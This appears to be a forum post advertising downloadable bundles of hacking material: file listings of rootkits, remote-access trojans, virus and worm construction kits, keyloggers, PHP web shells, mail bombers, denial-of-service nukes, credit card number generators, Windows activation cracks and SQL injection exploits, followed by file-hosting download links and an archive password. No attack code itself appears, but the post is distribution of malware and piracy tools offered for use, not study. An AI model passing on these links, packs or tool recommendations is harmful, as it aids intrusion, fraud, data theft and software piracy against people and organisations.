| Agony.zip
| Basic Rootkit.zip
| basic_loader.zip
| Boot Root.zip
| Chazv2.rar
| eeyebootroot.zip
| Eternity.rar
| FUTo Enhanced.zip
| Hacker Defender.zip
| He 4 Hook.zip
| He4Hook215b6.zip
| HideProcessHookMDL.zip
| hxdef.zip
| klister-0.4.zip
| Klog 1.0.zip
| Logoner.zip
| Morphine.zip
| NT illusion.zip
| NT Rootkit.zip
| patchfinder_w2k_2.11.zip
| rk_044.zip
| RK_SRC_040.2.zip
| SInAR-0.1.tar.gz
| SysEnterHook.zip
| vanquish-0.2.1.zip
| Vanquish.zip
| vice.zip
| w32root.zip
| Windows XP RootKit.zip
| WinEggDrop Shell Eternity Version.zip
| winkit.zip
| WinLogon Hijack 0.3-src.zip
| winlogonhijack-v0.3-src.rar
|
+---FeliksPack3 - Rapid
| Rapid.rar
|
+---FeliksPack3 - ReMade
| +---AC
| | \---ACStripper
| | ACRebuilder.exe
| | ACStripper.exe
| |
| +---AS
| | +---ASPackDie
| | | ASPackDie.exe
| | | ForceLibrary.dll
| | |
| | \---AStripper
| | Engine.sys
| | Stripper X.exe
| |
| +---DBPE
| | \---DBPE Unpacker
| | DBPE Unpacker.exe
| |
| +---FSG
| | \---UnFSG
| | FSG Dumper.exe
| | UnFSG.exe
| |
| +---MEW
| | \---UnMEW
| | UnMEW.exe
| |
| +---PE
| | +---PESpin
| | | PESpin.EXE
| | |
| | +---UnPECompact
| | | Realign.dll
| | | rebIT.dll
| | | UnPECompact 2.EXE
| | | UnPECompact.exe
| | |
| | \---unPEncrypt
| | unPEncrypt.exe
| |
| +---PEiD
| | | external.txt
| | | IDToText.Ini
| | | PEiD.exe
| | | userdb.txt
| | |
| | +---plugins
| | | AddSig.DLL
| | | ExtOverlay.dll
| | | FC.DLL
| | | FixCrc.dll
| | | GenOEP.dll
| | | IDToText.DLL
| | | ImpREC.dll
| | | kanal.dll
| | | Morphine.dll
| | | PackUPX.dll
| | | PEiDBundle.DLL
| | | pluzina1.dll
| | | pluzina2.dll
| | | pluzina3.dll
| | | pluzina4.dll
| | | RebuildPE.dll
| | | ResView.dll
| | | SecTool.dll
| | | undef.dll
| | | unfsg_v133.dll
| | | unupolyx.dll
| | | unupx.dll
| | | UnUPX5h17.dll
| | | XNResourceEditor_Plugin.DLL
| | | ypp.DLL
| | | ZDRx.dll
| | |
| | \---pluginsdk
| | defs.h
| | null.c
| | NULL.dll
| |
| +---Protection ID
| | Protection_ID.exe
| |
| +---Resource Hacker
| | Dialogs.def
| | ResHacker.cnt
| | ResHacker.exe
| | ResHacker.ini
| |
| \---Restorator2007
| Restorator2007.exe
| Restorator2007.txt
|
+---FeliksPack3 - Scanners
| 1-SuperScan 2.06.zip
| 1-SuperScan 4.zip
| 134_superscan4.zip
| 7th Sphere 1.2 Basic.zip
| Angry IP Scanner v2.08.zip
| angryipscan.zip
| aolip.zip
| AWSPS 4.61.zip
| Bitch in Threads.zip
| bitchinthreads.zip
| blue.zip
| Blues Port Scanner 5.zip
| bluesprtscn.zip
| CGI Founder v1.043.zip
| cgis4.zip
| CGISscan.zip
| Domain Scan.zip
| domainscanv1_0or.zip
| IP Grabber 3.zip
| IP Stealer Utilities.zip
| ITrace32 v2.00.zip
| lanspy.zip
| Legion NetBios Scanner v2.1.zip
| MooreR Port Scanner.rar
| NeoTrace 3.5.zip
| neotrc325.zip
| NetBIOS Name Scanner.rar
| netscantools4or.zip
| Nmap 4.01 (Win32).zip
| nmap-4.03.tar.bz2
| nts.zip
| Port Racer 2.0.zip
| Port Scanner.zip
| ProPort.zip
| Stealth - HTTP Scanner v1.0 build 23.zip
| sup3rsc4n.zip
| super.zip
| SuperScan 4.0.zip
| superscan4.zip
| TCP View.zip
| Trojan Hunter.zip
| TrojanHunter15.zip
| wasp.zip
|
+---FeliksPack3 - THE NET TOOLS 4.5!!
| NetTools4.5.74.zip
|
+---FeliksPack3 - Trojanz
| 0ptixv133.zip
| Amiboide Uploader 2.0.zip
| Amitis 1.4.3.zip
| Anal Rape 1.0.zip
| Assasin v2.0.zip
| Assasinv20.zip
| Atentator1.0.zip
| Ayo spy.zip
| Backdoor 2.02.zip
| BAD R.A.T 1.6.zip
| bandook_v135.zip
| Beast 2.07.zip
| Beast v2.07 06-08-2004.zip
| beast_206.zip
| beast_207.zip
| Bersek 1.1.zip
| Bifrost 1.2.1.zip
| bionet4-0-5.zip
| Bitfrost1.2.1.zip
| blueeye10b.zip
| BO2K 1.1.5.zip
| Bo2k.zip
| c-i-a-1-2-3.zip
| C-One.zip
| CFRATBETA.zip
| Char0n.zip
| CIA v1.23 PublicBeta 1.zip
| CIA v1.3.zip
| ColdFusion v1.2.rar
| Complete Control 2.0.zip
| cyberneticv162fix.zip
| cyberneticv162fix_rat.rar
| CyberPaky 1.8 Gold.zip
| Cyn 2.1.zip
| c_yn_21.zip
| d33Pthr04t.zip
| Destruction Designs 1.3.0.3 Beta.zip
| Digital Upload Trojan.zip
| elfRAT 1.2.zip
| Erazer Lite 0.3.zip
| Evilotus 1.3.zip
| Fearless Trojan 1.5.zip
| Flux V1.01 Pack.zip
| FuraX 1.0.zip
| furax_10b3.zip
| ggt23.rar
| Greek hackers rat v1.0.zip
| gupt2.zip
| Guptachar 2.0.zip
| Hackz.rar
| Hav-Rat1.3.0.zip
| HavRat 1.3.1.zip
| HelioS Trojan v3.1.zip
| hRat 1.0.zip
| Hue 1b.zip
| illusion.zip
| Institution2004 v0.4.zip
| InVasion 1.0.1.zip
| invasion1.1.zip
| Kryptonic Ghost 1.3.zip
| Latinus14(subseven gui).zip
| Leviathan10.zip
| Lithium v1.03.zip
| LogansSourcecode.zip
| m0sck3r.zip
| Mind Control v.5.0.zip
| mofotro 1.1.zip
| MofoTro1.7beta.zip
| n0kn0k72.zip
| n3t_d3v15.zip
| Net-Devil 1.5.zip
| NetAngel 1.0.zip
| NetBotAtt14En.zip
| NetDevil v1.5.zip
| NetShadow PublicBeta1.zip
| Nuclear RAT v1.0 PublicBeta 9.zip
| Nuclear Uploader v1.2.zip
| NuclearRatBeta9.zip
| older_trojans.zip
| Omerta13.zip
| Optix v1.33.rar
| OptixLite v0.5.zip
| OptixPro v1.32.zip
| Outbreak 0.3.0 Public Beta.rar
| Phantoms remote File Manager.zip
| PI2[1].3.0.ZIP
| PoisonIvy2.2.0.rar
| Proagent_2.1.9_SE.zip
| ProRat v1.9 FIX2.zip
| ProRat v1.9.zip
| ProRatv19.zip
| Prorat_ProCracker v1.9.exe
| ProRat_SE_Fx18.rar
| PsyRAT 1.0.zip
| RaZoR.zip
| remotedesktopspysetup4.zip
| RLPacker.rar
| S-H_Yahoo_Pass_Sender_1.1.zip
| senna spyworm generator.zip
| ShadowRAT Development Release 5.zip
| sharK v0.6.rar
| sharK_2.1_pass.shark-project.net.rar
| SilentSpy.zip
| SimpleTrojan.zip
| SkD RAT 2.0.zip
| skd2.zip
| SkDRAT2.zip
| Slh 4.0.rar
| Spirit 4.0 Beta 1.zip
| SpyOne 1.0.zip
| Sub7 2.2.zip
| sub7.zip
| sub7_21gold.zip
| Tequila Bandita v1.2F.rar
| TGA_backdoor_SP2_v2.0.zip
| th33fle_1_0.zip
| The Punisher Trojan.rar
| Theef v2.10.zip
| theef_210.zip
| Traffix_1.0_BETA_.rar
| Tranzhva 1.0.zip
| undetec33.zip
| UnDetected_3.3.rar
| Unicorn.zip
| Voice Spy.zip
| Vortex.zip
| Webcrack.zip
| wwwhack.zip
| X-BkDr 2.2.0.zip
| xHackerbasic2.1.zip
| xploit 1.4.5.zip
| xploit_1.4.5_rat.zip
| XZTOO.zip
| X_Rat_3.3.rar
| Y3K12.zip
| y3krat2k5rc10.zip
| Yet Another Trojan 1.3.zip
| You_Make_Me_Sick_Trojan.rar
| Yuri 1.2.zip
| Yuri_V12.zip
| Z-Dem0n 1.26.zip
| Zer0 Tolerance 1.9.zip
|
+---FeliksPack3 - Viruses
| | 6000_Viruses.rar
| |
| +---Binary
| | Access IV.zip
| | Agent.zip
| | Aids C.zip
| | Anthrax.zip
| | Antipascal.zip
| | BBook.zip
| | Blackjack32.zip
| | Caligula.zip
| | Civil War 2.8.zip
| | Damn!.zip
| | FoolsGold.zip
| | Groovie.zip
| | Hate97.zip
| | HD Killer.zip
| | labv14.zip
| | MDL.zip
| | NS.zip
| | Omega.zip
| | One.zip
| | OVCT.zip
| | Papaa.zip
| | Papab.zip
| | Parasite.zip
| | PSD 2000.zip
| | Shiver.zip
| | sic-vir.zip
| | Skimppy.zip
| | Smile.zip
| | Stupid.zip
| | Sugar 2.zip
| | Sugar.zip
| | Tequila.zip
| | Uruguay.zip
| | Ver1.zip
| | vir-v.zip
| | Vir61.zip
| | vircr20.zip
| | virfac.zip
| | virii-3.zip
| | vKit 1.0.zip
| | Win32.SKA.zip
| | win98vir.zip
| | WordBug.zip
| | WordSick.zip
| |
| +---Constructors
| | Access Macro Generator.zip
| | Acid Flowing Trojan Generator.zip
| | Advanced Batch Mutator.zip
| | Advanced Steam Trojan Generator 1.1.zip
| | Alchemic Life Generator.zip
| | ANSI Bomb Constructor.zip
| | Ansi Bomb Kit.zip
| | Biohazard's Worms Generator.zip
| | Biological Warefare Virus Creation Kit.zip
| | Byte Virus Generator v1.7 (DBVG).zip
| | Byte Virus Generator.zip
| | C++ Worm Generator.zip
| | CcT's Malware Construction Kit.zip
| | CM's Batch Virus Generator.zip
| | CM's Evil Tool (XP) Prank File Generator v1.0.zip
| | CVEX Virus Maker.zip
| | Dav's Media Files Worm Kit.zip
| | Dav's Virus Builder.zip
| | Deinonychus Virus Generator.zip
| | Dirty Nazi Virus Generator.zip
| | Dr.VBS Virus Maker.zip
| | Duke's Simple Virus Cloner Tool.zip
| | Easy Virus Maker.zip
| | Ejecutor Virus Creator.zip
| | Elektronny Pisatel Virusow.zip
| | Evil Tool.zip
| | EVX.zip
| | Falckon Encrypter.zip
| | G2 Phalcon Skism's.ZIP
| | Hell P2P Worm Generator (Fixed).zip
| | Instant Virus Production Kit.zip
| | JPS Virus Maker 2.0.zip
| | JPS Virus Maker.zip
| | Kids Worm Generator.zip
| | LineZer0 Macro Engine.zip
| | Looper Generator.zip
| | Macro Virus Development Kit.zip
| | Mass Destruction Library.zip
| | Mcft Visual Basic Script Worm Editor v9.0.zip
| | Mcft Visual Basic Script Worm Editor.zip
| | Mister Spock - Virusgenerator Version.zip
| | MSH Virus Kit.zip
| | Newborn Worm Generator 0.9.zip
| | Next Generation Virus Construktion Kit 0.45b.zip
| | Nowhere Utilities.zip
| | Nuke GenVirus.zip
| | Nuke Randomic Life Generator.zip
| | Pass Steal Trojan Gen.zip
| | PetiK Script Worm and Virus Generator.zip
| | Pokes WormGen 2.zip
| | Purgatory Companion Virus Kit.zip
| | Rajaat's Tiny Flexible Mutator.zip
| | Razorblade's Batch Virus Generator 1.1.zip
| | Satan's Apocalypse Virus Generator 1.0 by Z6.zip
| | Satanic Brain Virus Tool's.zip
| | SkamWerks Labs.zip
| | Special Format Generator v2.0 (BATCH Trojan Maker).zip
| | TeraBIT VirMaker 2.8.zip
| | The Czybik Gen Creation Kit 1.2.zip
| | The Fabulous Jany Batch Maker.zip
| | The Shinny Batch Trojan Generator 1.0b.zip
| | The Simple WinScript Virus Kit.zip
| | The Super Appending Batch VCK.zip
| | The Virus Wizard.zip
| | The WalruS Macro Virus Engine 1.21.zip
| | The WalruS Macro Virus Generator 1.0.zip
| | Time Bomb Generator.zip
| | Trojan Horse Construction Kit 2.0.zip
| | TSR Time Bomb Creator.zip
| | Uber Worm Generator (UWG).zip
| | Uber Worm Generator.zip
| | VBS Worms Generator 2.zip
| | VC.zip
| | Viral Matrix (VMG1.0).zip
| | Viral Matrix 1.0.zip
| | Virus Creation Laboratory.zip
| | Virus Researcher's Toolkit.zip
| | Win Script Virus Kit.zip
| | Windows Scripting Host Worm Constructor v1.0.zip
| | Windows Virus Creation Kit.ZIP
| | Worm Irc Script Kit.zip
| | XVGL 0.02b.zip
| | Zed's Word Macro Virus Constructor.zip
| |
| \---Sources
| VIRS-19.ZIP
| VIRS-AD.ZIP
| VIRS-EH.ZIP
| VIRS-IL.ZIP
| VIRS-MP.ZIP
| VIRS-QU.ZIP
| VIRS-VZ.ZIP
|
+---FeliksPack3 - Vista
| +---OEM BIOS Emulation Toolkit
| | | DIFxAPI.dll
| | | OEMTool.exe
| | | pkeys.txt
| | | readme.txt
| | | royal.inf
| | | royal.sys
| | |
| | \---CERTS
| | Acer.xrm-ms
| | ASUS.xrm-ms
| | Hewlett-Packard.xrm-ms
| | Lenovo.xrm-ms
| |
| +---Vista Activation Crack
| | pkeyconfig.xrm-ms
| | tokens.dat
| | Vista Activation Crack.txt
| |
| +---Vista Activator
| | | Install.exe
| | | TimerStop64.sys
| | |
| | \---Old
| | TimerStop.sys
| | Vista Test Crack.exe
| |
| +---Vista Activator 2007
| | Vista Activator 2007.exe
| |
| +---Vista Automated Activation Crack v3.0
| | KEYs.txt
| | Vista Automated Activation Crack v3.0.exe
| |
| +---Vista Final Crack
| | | Vista Final Crack.txt
| | |
| | \---Windows
| | +---ServiceProfiles
| | | \---NetworkService
| | | \---AppData
| | | \---Roaming
| | | \---Mcft
| | | \---SoftwareLicensing
| | | tokens.dat
| | |
| | \---System32
| | \---Licensing
| | \---pkeyconfig
| | pkeyconfig.xrm-ms
| |
| +---VISTA KEYS
| | VISTA KEYS.txt
| |
| +---Vista Loader
| | Vista Loader.exe
| |
| +---Windows Vista Activation 1.3
| | Windows.Vista.Activation.Installer.1.3.exe
| |
| +---Windows Vista Activator
| | Windows Vista Activator.exe
| | Windows Vista KEY.txt
| |
| +---Windows Vista Activator 2
| | Windows Vista Activator 2.EXE
| |
| +---Windows Vista StopTime Crack
| | 1.bat
| | 2.bat
| | check.bat
| | Readme.txt
| | Windows Vista Crack.exe
| |
| +---x64 x32 Fix
| | \---Windows
| | +---ServiceProfiles
| | | \---NetworkService
| | | \---AppData
| | | \---Roaming
| | | \---Mcft
| | | \---SoftwareLicensing
| | | tokens.dat
| | |
| | \---System32
| | \---Licensing
| | \---pkeyconfig
| | pkeyconfig.xrm-ms
| |
| \---XP
| | Key Finder.exe
| | OS Update Hack.exe
| | Random Serial Numbers.exe
| | RemoveWGA.exe
| | Reset.exe
| | Server 2003.exe
| | TweakNT.exe
| | WGA Fix.exe
| | Win 4 iN 1.exe
| | Win 95-2000.exe
| | Win XP Activator.exe
| | Windows 2003 & XP Anti Product Activation Crack 1.1.exe
| | Windows Xp Genuiner.exe
| | Windows XP KeyGen.exe
| | Windows XP Product ID Changer.exe
| | Windows XP-NET-2003 Product Key Changer.exe
| | WinXP Activation 1.1.exe
| | WinXP Corp. Key Changer 2.exe
| | WinXP_Validate_keys.exe
| | Xp Genuiner.reg
| | XP Password Manager.exe
| | XPPID.exe
| | xpy.exe
| |
| +---Windows Admin Password Hack
| | README.txt
| | Windows Admin Password Hack.iso
| |
| \---Windows Update Fix
| Corp Windows Update Fix.reg
| regupdate.vbe
|
+---FeliksPack3 - Vulnerabilty
| 950_sploit.rar
| CGI Founder.zip
| Cgi Scanner 4.zip
| LanSpy.zip
| Libwhisker 2.3.zip
| Nikto.zip
| NStealth HTTP Security Scanner 5.8 Free.zip
| Retina - For Windows NT.zip
| Shadow Security Scanner 7.84.zip
| THC-Amap Version 5.2.zip
| VoidEYE CGI Scanner.zip
| Vulnerabilityes Scanners & Exploiters Pack v1.10.zip
| vulnerabilty.rar
| Web Check.zip
|
+---FeliksPack3 - WebDownloaders
| Aphex Web DL 0.5 Lite.zip
| Atmaca Downloader 2.0.zip
| Blackcobra Downloader.zip
| Blind Downloader 1.1.zip
| BlxDl'er v2.zip
| BugsPrey 0.13.zip
| Cacheton Webdl 1.0.zip
| Code Injection Downloader.zip
| Cryptic Downloader.zip
| crypticdlr.zip
| D-WEB 1.0.zip
| D3S WebDownloader v1.0c.zip
| Downloader DARK.zip
| dwc.zip
| DWTC.zip
| Dyn-dl.zip
| Dyn-Dv1.zip
| Dynamic Downloader 1.0.zip
| Fearless Downloader.zip
| Fearless Web Downloader 1.2.zip
| Fearless Web Downloader 2.0.zip
| fedownloader_20.zip
| Follow the Reaper Downloader.zip
| ftrdl.zip
| FWB Web Downloader 1.0.zip
| fwebd10.zip
| Ghost Radmin 2.1.zip
| GIN! Downloader.zip
| GodWill.zip
| Hookbyter Final.zip
| hookbyter.zip
| ItalianFWB Downloader.zip
| KAOS WebDL v1.0.zip
| KaoTan 2.zip
| Lan Stealth Downloader.zip
| Mafia Downloader v1.0.zip
| Mind Controller.zip
| Noesis 1.1 Tiny.zip
| Passive Terror 1.3.zip
| Passive Terror v1.3 Final Edition.zip
| PRV-Downloader.zip
| pURE 0.9b.zip
| Sandesa 1.1.zip
| SelfSoft Downloader 2.0.zip
| Silent Assasin V2.0 Beta.zip
| silentassasinv20beta.zip
| SIS-Downloader v1.1.zip
| skddownloader.zip
| Smoke Downloader v1.1.zip
| SMW 1.4.3.zip
| Toxic Webdl 1.1.zip
| toxic11.zip
| TROLL Downloader 1.0.zip
| troll.zip
| U.R.B Downloader.zip
| Veritas Downloader v1.0.zip
| Wormito (Beta).zip
| YAW (Yet Another Webdownloader) v.0.1.zip
|
+---FeliksPack3 - Wireless
| | abappwd.zip
| | aerosol.zip
| | AIO Wireless Hack Toolz.exe
| | aircrack-ng-0.5.tar.gz
| | aircrack.zip
| | aircrackng.zip
| | aircrackpack.zip
| | aire.zip
| | airsnort.zip
| | aptools.zip
| | asleap.zip
| | cowpatty.zip
| | EasyWifiRadar.zip
| | Hotspotter-0.4.tar.gz
| | kismet-2005-08-R1.tar.tar
| | kismet-2006-04-R1.tar.gz
| | netstumbler.zip
| | Wellenreiter-v1.9.tar.gz
| | weplab.zip
| | wepwedgie-alpha-0.1.0.tar.gz
| | wireshark-setup-0.99.5.zip
| |
| +---Client evaluation tools
| | hotspotter-0.4.tar.gz
| | karma-0.4.tar.gz
| | rogue_squadron-0.1.bin
| | tool-probemapper0.5-tar.bz2
| |
| +---Misc
| | Admin-guid.pdf
| | advanced-guide.pdf
| | AIO.Wireless.Hack.Toolz.txt
| | AIO.Wireless.Hack.Toolz_1.txt
| | airpwn-0.50c.tar.gz
| | airsnarf-0.2.tar.gz
| | airsnort-0.2.7e.tar.gz
| | ap-utils-1.5.tar.bz2
| | aphopper-0.3.tar.gz
| | applewepkey.txt
| | aptools-unix-gtk-0.1.0.tar.gz
| | Bash-Beginners-Guide.pdf
| | gpsd-2.31.tar.gz
| | gpsdrive-2.10pre2.tar.gz
| | Hotspotter-0.4.tar.gz
| | kismet-2005-08-R1.tar.tar
| | macfld.txt
| | netstumblerinstaller_0_4_0.tar.rar
| | ori.11b.we14-2.mos
| | Wellenreiter-v1.9.tar.gz
| | WEPCrack-0.1.0.tar.gz
| | wepwedgie-alpha-0.1.0.tar.gz
| | wifi2eth.txt
| |
| +---RF signal strength monitoring
| | wavemon-current.tar.gz
| | wpm-0.00.tgz
| | wscan1.00.tar.gz
| | wscan_1.0_arm.ipk
| | xnetworkstrength-0.4.2.tar.gz
| |
| +---Wireless custom frame generation
| | airjack-v0.6.6b-alpha.tar.bz2
| | airjack26-0.1a.tar.bz2
| | chopchop-0.1.zip
| | fakeap-0.3.2.tar.gz
| | fata_jack.txt
| | file2air-0.1.tar.bz2
| | libradiate-beta-0.02.tar.gz
| | libwlan-0.1.tar.gz
| | omerta_source.txt
| | void11-0.2.0.tar.bz2
| | wifitap.tgz
| | wnet.tgz
| |
| +---Wireless Network Discovery, Mapping and Traffic Analysis
| | airfart-v0.2.1.tar.gz
| | airtraf-1.1.tar.gz
| | aphunter.tgz
| | apradar-0.52.tar.gz
| | bsd-airtools-v0.2.tgz
| | ClassicStumbler.img.sit.hqx
| | gtkskan-0.2.tgz
| | istumbler-96.tgz
| | KisMACR65.zip
| | kismet-2005-08-R1.tar.gz
| | Mognet-1.16.tar.gz
| | monitoring-2_6-2.diff.bz2
| | perlskan-0.1.tar.gz
| | prismdump_20001122.tgz
| | prismstumbler-0.7.3.tar.bz2
| | ssidsniff-0.42.tar.gz
| | wardrive-2.3.tar.gz
| | wavestumbler-1.2.0.tar.gz
| | Wellenreiter-v1.9.tar.gz
| | wi-find-0.2.1.tar.bz2
| | WifiScanner-1.0.2.tar.gz
| | wispy-tools-2006-01-R1.tar.gz
| | wistumbler-current.tar.gz
| | wlan-scan-0.0.1.tgz
| |
| +---Wireless-specific encryption cracking
| | aircrack-2.41.tgz
| | airsnort-0.2.7e.tar.gz
| | asleap-1.4.tgz
| | attacker.tgz
| | bsd-airtools-v0.2.tgz
| | cowpatty-2.0.tgz
| | leap.tgz
| | LucentRegCrypto-0.3.zip
| | thc-leapcracker-0.1.tar.gz
| | WepAttack-0.1.3.tar.gz
| | WEPCrack-0.1.0.tar.gz
| | WepDecrypt-0.7.tar.gz
| | weplab-0.1.5.tar.gz
| | wepwedgie-alpha-0.1.0.tar.gz
| | wep_tools.tgz
| | wnet.tgz
| |
| \---www.wardrive.net
| aerosol-0.65.zip
| airbase-stable.tar.gz
| aircrack-ng-0.9-win.zip
| aircrack-ng-0.9.tar.gz
| airfart-v0.2.1.tar.gz
| airjack-v0.6.6b-alpha.tar.bz2
| airsnarf-0.2.tar.gz
| airsnarf.ppt
| airtraf-1.1.tar.gz
| aphopper-0.3.tar.gz
| apradar-0.52-1.i586.rpm
| asleap-1.4.tgz
| Hitchhiker0.4b1.msi.zip
| hotspotdk.zip
| hotspotter-0.4.tar.gz
| istumbler-98.tgz
| kismet-2007-01-R1b.tar.gz
| MiniStumblerInstaller_0_4_0.exe
| Mognet-1.16.tar.gz
| NetStumblerInstaller_0_4_0.exe
| PacketyzerSetup_5_0_0.exe
| pong_v1.1.zip
| prismstumbler-0.7.3.tar.bz2
| rogue_squadron-0.1.tar
| ss2004-5.325.zip

DOWNLOAD THEM FROM HERE
http://rapidshare.com/files/39120712/FeliksPack3.part01.rar

http://rapidshare.com/files/45737784/FeliksPack3.part02.rar


http://rapidshare.com/files/56306635/FeliksPack3.part03.rar

http://rapidshare.com/files/56322904/FeliksPack3.part04.rar

http://rapidshare.com/files/56363897/FeliksPack3.part05.rar

http://rapidshare.com/files/56394234/FeliksPack3.part06.rar

http://rapidshare.com/files/56520789/FeliksPack3.part07.rar

http://rapidshare.com/files/40549346/FeliksPack3.part08.rar

http://rapidshare.com/files/40563612/FeliksPack3.part09.rar

http://rapidshare.com/files/40584989/FeliksPack3.part10.rar

http://rapidshare.com/files/40605397/FeliksPack3.part11.rar

http://rapidshare.com/files/40753111/FeliksPack3.part12.rar

http://rapidshare.com/files/56537339/FeliksPack3.part13.rar

http://rapidshare.com/files/56545036/FeliksPack3.part14.rar


password:made_by_feliks



Mini Ville Tools



Hacking Tool
#### Clients ####
back orifice source
BackDoor v2.0
DeepThroat v3.1
Doraah War Engine v1.0b
Hack 'a' Tack v1.20
Http Bomber v1.001b
Kuang2 Client v0.21
NetBus v1.20
NetBus v1.70
NetBus v2.0b Pro
SchoolBus v1.85
Shadow Remote Administator & Control v1.04
Shadow Security Scanner v5.07
Shadow Security Scanner v5.21
SubSeven v2.1 Gold Edition
SubSeven v2.1
Vampire v1.2
WebCracker v4.0
WinCrash v2.0
wwwhack v1.913
------------------

#### Security ####
Anti-Keylogger v2.1
Anti-Trojan v5.5
Local Port Scanner v1.2.2
NeoTrace Pro v3.20
NeoWatch v2.4
PestPatrol v3.2
ProPort v2.0
Trojan remover v3.3.7
Trojans First Aid Kit v5.0
------------------

#### Serial Software ####
Angus v3.0
Dragon v2.0
KeyGen Killer v1.1
NEO 2.0b
Octavius v2.1
Oscar 2000
Ripper v1.00
Serial-0-Matic v2.4
Serials 2000 Template file - Little Red Wagon
Serials 2000 v7.1 Crew 2001-9-16
Serials 2000 v7.2 BytE RippeR 2003-12-15
Tesla v1.4
------------------

#### Chat ####
Blue Fire v2.5
------------------

#### Mail Bomb ####
Anonymous Mail Bomber
Divine Intervention
Euthanasia v1.52
fmbomb
Homicide
KaBoom v3.0
Mail Bomber v8.1
Mail Fraud
mailbombv02b
MiSoSKiaN's Fake Mail
Nemisis Mail Bomber v1.0
Poperganda v2.0
Quick Fyre
Saddamme v0.2
SMS Bomber v1.3
Unabomber
------------------

#### Ping & Nukes ####
Battle Pong v1.0
BitchSlap v1.0
Click v1.4
Evil FTP Hacker
Evil Ping v0.3b
F-ed Up v2.0
Gimp
IgmpNuke v1.0
kod
LORNuke v2.0
Meliksah Nuke v2.5
Muerte v2.1
Nuke v2.3
Nuke'em v1.0
VZMNuker
WinNuke v95
------------------

#### Keyboard Key Logger ####
KeyLog98
KeyTrap v1.0
------------------

#### Java ####
appletkiller
attackthread
consume
hostile
nasirc
scapegoat
silentthreat
ungrateful
wasteful
------------------

#### Port & IP Scaner ####
Angry IP Scanner v2.08
a*s Sniffer v1.0.1
Blues Port Scanner v5
IP Stealer Utilities
ITrace32 v2.00
Porter v1.2
SuperScan v2.06
------------------

#### Credit Card Generator ####
CCard Number Generator
Credit Card Generator v1.0b
------------------

#### Crash Hard Drive ####
Crash Pentium 2
Hard Drive Killer Pro v4.0
Hard Drive Killer Pro v5.0b
------------------

#### Password Recovery Tool ####
Cain v1.51
LC3

Download them here -
http://rapidshare.com/files/55108186/HACKING_tools.rar
http://www.megaupload.com/?d=DGPC2EWD



ShkoShiko hacker AIO

ShkoShiko hacker AIO
hold in:
Antirus attacker v.3.0
AIO_phpbb2_tools
Back_door
BIOS pass remover
crimetime_2.0
cvv2_retriever
Davs2006
DeepUnFreezer
edit cookies mozillafx
FreeKiller
ftpd
hack Flash template
HAX tools
http_flooder-v3
IIS
intelmiX DOS email Attacker1
Internet_Download_Manager_5
IP_Forcer
IP_Hider_v2[1].7_-xray-
Liçensa & Pakoja e Windows Shqip
M41l-b0mb_2
MD5 Cracker
Messblack MSN Booter
MSN Cracker
MSN freezers:
Quote:
msnlocker
msn_locker_01
msn_freezer_ri
msn freezer
ent3r[x] ass
938595-MEssBlackFrezzerBeta
631375-HotFreeze 1.6
471905--50°CelsiusMSNFreezer
466870-XXLocker
msnfreezer

NetBioS
nolimitcracker
nukehack
PasswordStealer
Patch Makers AIO
phpBB-XSS
rapidshare_time_resetter
rapidshare_unlimiter
Resource Hacker
RFI scanners+dorks
root kits
Server_Killer
speedupPC Tutorial + BATCH
Sprut
Try2DDoS_Builder(español)
UdPflooder
Warez Sites
WebHacking_TooLz:

Apache Hacking TooLz
Remote File Inclusion And Remote Command Execution Directory
Databases & SQL Injection & XSS TooLz Directory
PHP Shells

+ Bonus Tutorials
Size: 73 mb

http://www.ma-piks.ch/AIOv1.rar

http://rapidshare.com/files/67172409/AIOv1.rar



Good Shell Pack

Good Shell Pack
accept_language.txt
Ajax_PHP Command Shell.txt
Antichat Shell v1.3.txt
Ayyildiz Tim -AYT- Shell v 2.1 Biz.txt
aZRaiLPhp v1.0.txt
backupsql.txt
c99.txt
c99_locus7s.txt
c99_madnet.txt
c99_PSych0.php
c99_w4cking.txt
Crystal.txt
ctt_sh.txt
cybershell.txt
dC3 Security Crew Shell PRiV.txt
Dive Shell 1.0 - Emperor Hacking Team.txt
DTool Pro.txt
Dx.txt
GFS web-shell ver 3.1.7 - PRiV8.txt
gfs_sh.txt
h4ntu shell [powered by tsoi].txt
iMHaPFtp.txt
ironshell.txt
JspWebshell 1.2.txt
KAdot Universal Shell v0.1.6.txt
lamashell.txt
Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.txt
load_shell.txt
matamu.txt
Moroccan Spamers Ma-EditioN By GhOsT.txt
myshell.txt
Mysql interface v1.0.txt
MySQL Web Interface Version 0.8.txt
mysql.txt
mysql_tool.txt
NCC-Shell.txt
NetworkFileManagerPHP.txt
NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt
nshell.txt
nstview.txt
PH Vayv.txt
PHANTASMA.txt
PHP Shell.txt
php-backdoor.txt
php-include-w-shell.txt
pHpINJ.txt
PHPJackal.txt
PHPRemoteView.txt
Private-i3lue.txt
pws.txt
r57.txt
r57_iFX.txt
r57_kartal.txt
r57_Mohajer22.txt
rootshell.txt
ru24_post_sh.txt
s72 Shell v1.1 Coding.txt
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.txt
Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt
sh3lls.rar
SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.txt
simple_cmd.txt
simple-backdoor.txt
SimShell 1.0 - Simorgh Security MGZ.txt
SnIpEr_SA Shell.txt
Uploader.txt
WinX Shell.txt
Worse Linux Shell.txt
zacosmall.txt

Download them Here-
http://rapidshare.com/files/67448554/swordfish.sh3lleys.rar



Hacker's Tool Set (45 Hacking Tools) AIO!


IMC Grahams Trojan
IMC Ice Dragon
Myspace Password Cracker
IMC Myspace Phisher
Ultra Surf
Rapid Share Account Gen
MSN Nudge Madness
Ice Reloaded MSN Freezer
IMC Handbook
BrutusAE2
Lord PS
Hoax Toolbox
IMC Word List
Blues Port Scanner
Bandook RAT v1.35
Project Satan 2.0
EES binder v1.0
File Injector v3
Remote Desktop Spy v4.0
Passive Terror v1.3 Final Edition
Dyn-DL (Dynamic downloader)
Silent Assassin v2.0
Net Scan Tools v4.2
Rocket v1.0
NStealth HTTP Security Scanner v5.8
Attack Toolkit v4.1 & source code included
Legion NetBios Scanner v2.1
Battle Pong
TeraBIT Virus Maker v2.8
p0kes WormGen 2.0
JPS Virus Maker
IRC Ban Protection
IRC Mega Flooder
FTP Brute Hacker
RAR Password Cracker
Vbulletin 3.6.5 Sql Injection Exploit
IPB 2-2.1.5 Sql Injection Exploit
IPB 2-2.1.7 Exploit
Cain & Abel v4.9.3
NetStumbler 0.4.0
Cryptor 1.2
